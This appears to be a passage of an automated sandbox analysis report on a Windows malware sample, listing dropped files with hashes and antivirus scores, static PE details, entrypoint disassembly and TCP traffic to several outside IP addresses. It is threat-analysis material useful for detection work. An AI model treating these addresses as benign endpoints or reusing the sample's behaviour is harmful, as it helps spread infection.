                                                                                                                                  Preview: .__.?.u.....u.....u...............D$...".F.....7....z..%t......'{S......Z1..4...m<....9.u.W.......Nm<.t.....H1.H_...bsF..S.u..'.q4..:..C...!|.A..C.;./.h.$...b<.w...@y..[vi....L.+.......G...:x~ew.G...a.fR...$E.Rd.Xb..U]~P........t...c.#.^...9..I.@v7...3.....0......@......T'...K.m..D.....(.8.6eJpN..p...jU....kD.&.......7n=.A..%.X~.3.P..B.J..|...=...0...s.N.K...8........./5.N.K.Xf......TQ.....rK..uCU.8C...0...L.+...0...I..r..iW_&.Sj..)`z...)...jA..2...T...j.WAnY3.c.S.o.AW.......1m...Ubc.JC.$L.;..?e.O...K.c.I...t...1Q=..m<....9~U.8C.<..mZ9g...r\.C..yD....K.x8l.....<.0..E....d.=..m...$..}.8$*...5Y...3F.QT.I..6..(..r.m.E.T..q........<.=(...q....?8A....m..|m<.1....m<X....ul<.........m<`.......b.?.m<a.l.|m<.\H......s)..9.u.5...N2..5).. .aJ0..t.e..........-.Ao......3eH.|.........Lh...C5A.3...I..^.....w.{..#.3...../0.4....r.8$....5A.g4,..^.t.....[.A.8..8..HL...V..7.....[.\..G....$... ....4.^Y...$.v...\.h..$...x......$..5x.`.l...>.>.N...c.T....._uv..^~.=
                                                                                                                                  C:\Users\user\AppData\Local\Temp\a.txt
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\8CE5.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):23
                                                                                                                                  Entropy (8bit):2.2068570640942187
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:jNDBfN:jNVfN
                                                                                                                                  MD5:6C3AA179406696C66ACF8DC984ABC7DF
                                                                                                                                  SHA1:7F66AB35CA41A3449382F9DA68864D64EC182F28
                                                                                                                                  SHA-256:798DF5B3298985AE022F8C5A6714F7891EAA49B2E4B24E3A8B2329C04DD11C71
                                                                                                                                  SHA-512:7551B1FBE1CAEF52FD0AFC8601DCD0D6F013198FCC7CBF57F42EB090577B34B91E6F4ADCE1A76BC7FFD95559A3FDD529FE6DE90B8335EF8E901CBB606DDAE836
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: ghdfhjfghfgjfdghfghfgdh
                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsn7A92.tmp\System.dll
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\8CE5.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):12288
                                                                                                                                  Entropy (8bit):5.814115788739565
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                                                                  MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                                                                  SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                                                                  SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                                                                  SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Roaming\acgvitw
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):307712
                                                                                                                                  Entropy (8bit):6.044937878174567
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:WnXZmLTBtc8uQreHIN/51x5iVt+A6p2KSVEn1y:WkTBdQHId51x5iqA6p2KSmA
                                                                                                                                  MD5:6A4B078A500C92AE7BBF3563A49FB100
                                                                                                                                  SHA1:03005F11D47B9EF868DF361C1603F33A9CEE55FD
                                                                                                                                  SHA-256:A5ACEF0BE0BD9993E756BB20A6B4E9FC2B1E819A02992255E4839D217ECF7258
                                                                                                                                  SHA-512:6B87CC669FBDD1D61BEED2AE02107C73540EDCF96E9E3A9128C7EB6B7ED963FBDC69B0C1442DFC6654CC781242A3FB2179C5FC427461DB21F6D8AC09959146DC
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........J6G.$eG.$eG.$e..eE.$e(.eV.$e(.e!.$eN.eB.$eG.%e..$e(.em.$e(.eF.$e(.eF.$eRichG.$e........PE..L...~..`..........................................@..................................'..........................................<...............................L...P...............................X...@............................................text...p........................... ..`.data...............................@....rsrc...............................@..@.reloc...4.......6...|..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Roaming\acgvitw:Zone.Identifier
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):26
                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                  Malicious:true
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: [ZoneTransfer]....ZoneId=0

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Entropy (8bit):6.044937878174567
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:fw8ex1BNek.exe
                                                                                                                                  File size:307712
                                                                                                                                  MD5:6a4b078a500c92ae7bbf3563a49fb100
                                                                                                                                  SHA1:03005f11d47b9ef868df361c1603f33a9cee55fd
                                                                                                                                  SHA256:a5acef0be0bd9993e756bb20a6b4e9fc2b1e819a02992255e4839d217ecf7258
                                                                                                                                  SHA512:6b87cc669fbdd1d61beed2ae02107c73540edcf96e9e3a9128c7eb6b7ed963fbdc69b0c1442dfc6654cc781242a3fb2179c5fc427461db21f6d8ac09959146dc
                                                                                                                                  SSDEEP:6144:WnXZmLTBtc8uQreHIN/51x5iVt+A6p2KSVEn1y:WkTBdQHId51x5iqA6p2KSmA
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........J6G.$eG.$eG.$e...eE.$e(..eV.$e(..e!.$eN..eB.$eG.%e..$e(..em.$e(..eF.$e(..eF.$eRichG.$e........PE..L...~..`...................

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:c8d0d8e0f8e0f0e8

                                                                                                                                  Static PE Info

                                                                                                                                  General

                                                                                                                                  Entrypoint:0x418ca0
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x60A8C17E [Sat May 22 08:31:58 2021 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:5
                                                                                                                                  OS Version Minor:1
                                                                                                                                  File Version Major:5
                                                                                                                                  File Version Minor:1
                                                                                                                                  Subsystem Version Major:5
                                                                                                                                  Subsystem Version Minor:1
                                                                                                                                  Import Hash:4ee83624426d72301d5dc28b390adabc

                                                                                                                                  Entrypoint Preview

                                                                                                                                  Instruction
                                                                                                                                  mov edi, edi
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  call 00007FD9F4CB3FEBh
                                                                                                                                  call 00007FD9F4CB3296h
                                                                                                                                  pop ebp
                                                                                                                                  ret
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  mov edi, edi
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  push FFFFFFFEh
                                                                                                                                  push 0042F4C0h
                                                                                                                                  push 00419680h
                                                                                                                                  mov eax, dword ptr fs:[00000000h]
                                                                                                                                  push eax
                                                                                                                                  add esp, FFFFFF98h
                                                                                                                                  push ebx
                                                                                                                                  push esi
                                                                                                                                  push edi
                                                                                                                                  mov eax, dword ptr [0043D4D0h]
                                                                                                                                  xor dword ptr [ebp-08h], eax
                                                                                                                                  xor eax, ebp
                                                                                                                                  push eax
                                                                                                                                  lea eax, dword ptr [ebp-10h]
                                                                                                                                  mov dword ptr fs:[00000000h], eax
                                                                                                                                  mov dword ptr [ebp-18h], esp
                                                                                                                                  mov dword ptr [ebp-70h], 00000000h
                                                                                                                                  lea eax, dword ptr [ebp-60h]
                                                                                                                                  push eax
                                                                                                                                  call dword ptr [0040109Ch]
                                                                                                                                  cmp dword ptr [004BC700h], 00000000h
                                                                                                                                  jne 00007FD9F4CB3290h
                                                                                                                                  push 00000000h
                                                                                                                                  push 00000000h
                                                                                                                                  push 00000001h
                                                                                                                                  push 00000000h
                                                                                                                                  call dword ptr [0040123Ch]
                                                                                                                                  call 00007FD9F4CB3413h
                                                                                                                                  mov dword ptr [ebp-6Ch], eax
                                                                                                                                  call 00007FD9F4CB773Bh
                                                                                                                                  test eax, eax
                                                                                                                                  jne 00007FD9F4CB328Ch
                                                                                                                                  push 0000001Ch
                                                                                                                                  call 00007FD9F4CB33D0h
                                                                                                                                  add esp, 04h
                                                                                                                                  call 00007FD9F4CB3538h
                                                                                                                                  test eax, eax
                                                                                                                                  jne 00007FD9F4CB328Ch
                                                                                                                                  push 00000010h
                                                                                                                                  call 00007FD9F4CB33BDh
                                                                                                                                  add esp, 04h
                                                                                                                                  push 00000001h
                                                                                                                                  call 00007FD9F4CB76E3h
                                                                                                                                  add esp, 04h
                                                                                                                                  call 00007FD9F4CB539Bh
                                                                                                                                  mov dword ptr [ebp-04h], 00000000h
                                                                                                                                  call 00007FD9F4CB4F7Fh
                                                                                                                                  test eax, eax

                                                                                                                                  Rich Headers

                                                                                                                                  Programming Language:
                                                                                                                                  • [LNK] VS2010 build 30319
                                                                                                                                  • [ASM] VS2010 build 30319
                                                                                                                                  • [ C ] VS2010 build 30319
                                                                                                                                  • [C++] VS2010 build 30319
                                                                                                                                  • [RES] VS2010 build 30319
                                                                                                                                  • [IMP] VS2008 SP1 build 30729

                                                                                                                                  Data Directories

                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2fa840x3c.text
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xbe0000xa0a0.rsrc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xc90000x174c.reloc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x13500x1c.text
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x82580x40.text
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x2fc.text
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                  Sections

                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  .text0x10000x2fc700x2fe00False0.608125611945data7.03736201849IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                  .data0x310000x8c7040xd800False0.0176323784722PGP\011Secret Sub-key -0.251090871501IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  .rsrc0xbe0000xa0a00xa200False0.66869212963data6.20344591944IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .reloc0xc90000x34f20x3600False0.361545138889data3.78704629769IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                  Resources

                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                  RT_ICON0xbe4000x6c8dataSpanishColombia
                                                                                                                                  RT_ICON0xbeac80x568GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                  RT_ICON0xbf0300x10a8dataSpanishColombia
                                                                                                                                  RT_ICON0xc00d80x988dBase III DBT, version number 0, next free block index 40SpanishColombia
                                                                                                                                  RT_ICON0xc0a600x468GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                  RT_ICON0xc0f180x8a8dataSpanishColombia
                                                                                                                                  RT_ICON0xc17c00x6c8dataSpanishColombia
                                                                                                                                  RT_ICON0xc1e880x568GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                  RT_ICON0xc23f00x10a8dataSpanishColombia
                                                                                                                                  RT_ICON0xc34980x988dataSpanishColombia
                                                                                                                                  RT_ICON0xc3e200x468GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                  RT_ICON0xc42e80x25a8dataSpanishColombia
                                                                                                                                  RT_ICON0xc68900x10a8dataSpanishColombia
                                                                                                                                  RT_STRING0xc7a380x662dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                  RT_ACCELERATOR0xc79c00x78dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                  RT_ACCELERATOR0xc79600x60dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                  RT_GROUP_ICON0xc0ec80x4cdataSpanishColombia
                                                                                                                                  RT_GROUP_ICON0xc79380x22dataSpanishColombia
                                                                                                                                  RT_GROUP_ICON0xc42880x5adataSpanishColombia

                                                                                                                                  Imports

                                                                                                                                  DLLImport
                                                                                                                                  KERNEL32.dllOpenFileMappingA, FindFirstVolumeW, TerminateProcess, FatalExit, GetVersionExA, CopyFileExA, GetConsoleCP, VerifyVersionInfoA, VerLanguageNameW, GetDriveTypeW, FindFirstChangeNotificationA, FreeEnvironmentStringsW, GetProcessPriorityBoost, SetVolumeMountPointA, GetLongPathNameA, CopyFileW, TlsGetValue, VerifyVersionInfoW, GetConsoleCursorInfo, SystemTimeToTzSpecificLocalTime, GetProcessShutdownParameters, MultiByteToWideChar, GetNamedPipeHandleStateA, BuildCommDCBAndTimeoutsW, GetProcAddress, GetModuleHandleA, GlobalAlloc, Sleep, MoveFileW, GetCommandLineA, InterlockedDecrement, DeleteFileW, GetVolumePathNamesForVolumeNameW, GetPrivateProfileStringA, GetPrivateProfileIntA, HeapSize, GetProcessHeap, CreateNamedPipeW, SetFileShortNameW, GetStartupInfoW, GetEnvironmentVariableA, GetCPInfoExA, GetWindowsDirectoryA, GetSystemWow64DirectoryA, GetLastError, WriteProfileSectionW, GetCalendarInfoW, SetLastError, GetExitCodeThread, DebugBreak, ReadFileScatter, ReadFile, SetDefaultCommConfigA, GetNumberOfConsoleMouseButtons, GlobalWire, WritePrivateProfileSectionA, WriteProfileStringA, lstrcatW, FindCloseChangeNotification, CreateActCtxW, InterlockedPopEntrySList, InterlockedExchange, SetConsoleTitleW, DefineDosDeviceA, LoadLibraryA, WritePrivateProfileStringA, WaitNamedPipeW, GetConsoleMode, UnregisterWait, PeekConsoleInputA, GetNumberFormatA, FindResourceExA, FindNextFileA, FindFirstFileW, FreeEnvironmentStringsA, CreateSemaphoreW, EnumTimeFormatsA, SetLocalTime, OutputDebugStringW, SetFileShortNameA, lstrcpyW, HeapWalk, CreateHardLinkW, RaiseException, GetSystemTime, UnlockFile, EnumCalendarInfoExA, MoveFileExA, SetConsoleScreenBufferSize, SearchPathW, IsBadStringPtrW, GetAtomNameA, GetConsoleAliasExesLengthA, WriteConsoleInputW, LocalLock, EnumDateFormatsW, SetCommState, SetSystemTimeAdjustment, EnumSystemLocalesA, GetNumaHighestNodeNumber, SetEndOfFile, ResetWriteWatch, SetUnhandledExceptionFilter, OpenSemaphoreW, GetLargestConsoleWindowSize, GetProfileStringW, ReleaseActCtx, OpenMutexW, GetComputerNameA, HeapValidate, CommConfigDialogW, OpenMutexA, GetStringTypeA, SetSystemPowerState, FindResourceW, SetTimerQueueTimer, EnumResourceNamesA, GetProcessTimes, RegisterWaitForSingleObject, IsBadReadPtr, GetCurrentProcessId, FatalAppExitW, GetFileAttributesW, lstrcpynW, DisconnectNamedPipe, FillConsoleOutputCharacterA, GetCompressedFileSizeA, GetFullPathNameA, WriteProfileStringW, SetInformationJobObject, GlobalAddAtomA, EnumDateFormatsA, TerminateJobObject, QueryDosDeviceA, LeaveCriticalSection, CreateTimerQueueTimer, SetCurrentDirectoryA, FlushFileBuffers, CloseHandle, CreateFileW, EncodePointer, DecodePointer, GetCommandLineW, HeapSetInformation, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, GetModuleHandleW, InterlockedIncrement, IsProcessorFeaturePresent, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, ExitProcess, GetModuleFileNameW, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, HeapCreate, WriteFile, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, EnterCriticalSection, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, RtlUnwind, LoadLibraryW, HeapAlloc, GetModuleFileNameA, HeapReAlloc, HeapQueryInformation, HeapFree, WideCharToMultiByte, LCMapStringW, GetStringTypeW, OutputDebugStringA, WriteConsoleW, SetFilePointer, SetStdHandle, DeleteFileA
                                                                                                                                  USER32.dllGetMenuItemID, GetCursorInfo

                                                                                                                                  Possible Origin

                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                  SpanishColombia
                                                                                                                                  Divehi; Dhivehi; MaldivianMaldives

                                                                                                                                  Network Behavior

                                                                                                                                  Network Port Distribution

                                                                                                                                  TCP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Dec 18, 2021 15:31:41.951090097 CET4975880192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:31:42.182357073 CET8049758211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:42.182535887 CET4975880192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:31:42.182842970 CET4975880192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:31:42.182873964 CET4975880192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:31:42.415596008 CET8049758211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:43.330394030 CET8049758211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:43.330430031 CET8049758211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:43.330522060 CET4975880192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:31:43.331688881 CET4975880192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:31:43.485666037 CET4976180192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:31:43.562717915 CET8049758211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:43.747230053 CET8049761222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:43.751965046 CET4976180192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:31:43.752279997 CET4976180192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:31:43.752311945 CET4976180192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:31:44.016503096 CET8049761222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:44.949960947 CET8049761222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:44.949994087 CET8049761222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:44.950098991 CET4976180192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:31:44.950210094 CET4976180192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:31:45.214338064 CET8049761222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:45.230012894 CET4976280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:45.472491026 CET8049762218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:45.476309061 CET4976280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:45.476506948 CET4976280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:45.476528883 CET4976280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:45.718930006 CET8049762218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:46.648004055 CET8049762218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:46.648030996 CET8049762218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:46.648180008 CET4976280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:46.648755074 CET4976280192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:46.759437084 CET4976380192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:46.890899897 CET8049762218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:47.001019001 CET8049763218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:47.001254082 CET4976380192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:47.001285076 CET4976380192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:47.001288891 CET4976380192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:47.243212938 CET8049763218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:47.850507021 CET8049763218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:47.850529909 CET8049763218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:47.850668907 CET4976380192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:47.850698948 CET4976380192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:47.893765926 CET4976580192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:48.092392921 CET8049763218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:48.190440893 CET8049765218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:48.190581083 CET4976580192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:48.190701962 CET4976580192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:48.190715075 CET4976580192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:48.487365961 CET8049765218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:49.417517900 CET8049765218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:49.417546034 CET8049765218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:49.417695045 CET4976580192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:49.417747974 CET4976580192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:49.445301056 CET4976780192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:49.715500116 CET8049765218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:49.743278027 CET8049767218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:49.743402004 CET4976780192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:49.743518114 CET4976780192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:49.747071028 CET4976780192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:50.047038078 CET8049767218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:50.991211891 CET8049767218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:50.991293907 CET8049767218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:50.991339922 CET4976780192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:50.991374016 CET4976780192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:51.019668102 CET4976880192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:31:51.320879936 CET8049768222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:51.321033001 CET4976880192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:31:51.321173906 CET4976880192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:31:51.321188927 CET4976880192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:31:51.622663021 CET8049768222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:51.842689991 CET4976780192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:31:52.141036034 CET8049767218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:52.518672943 CET8049768222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:52.518699884 CET8049768222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:52.518856049 CET4976880192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:31:52.518889904 CET4976880192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:31:52.572040081 CET4976980192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:31:52.820383072 CET8049769222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:52.820503950 CET4976980192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:31:52.820661068 CET4976980192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:31:52.820697069 CET4976980192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:31:52.823883057 CET8049768222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:53.063500881 CET8049769222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:53.983696938 CET8049769222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:53.983747959 CET8049769222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:53.983838081 CET4976980192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:31:53.983896971 CET4976980192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:31:54.079910994 CET4977080192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:31:54.225754976 CET8049769222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:54.313050032 CET8049770190.117.75.91192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:54.313148022 CET4977080192.168.2.6190.117.75.91
                                                                                                                                  Dec 18, 2021 15:31:54.313282967 CET4977080192.168.2.6190.117.75.91
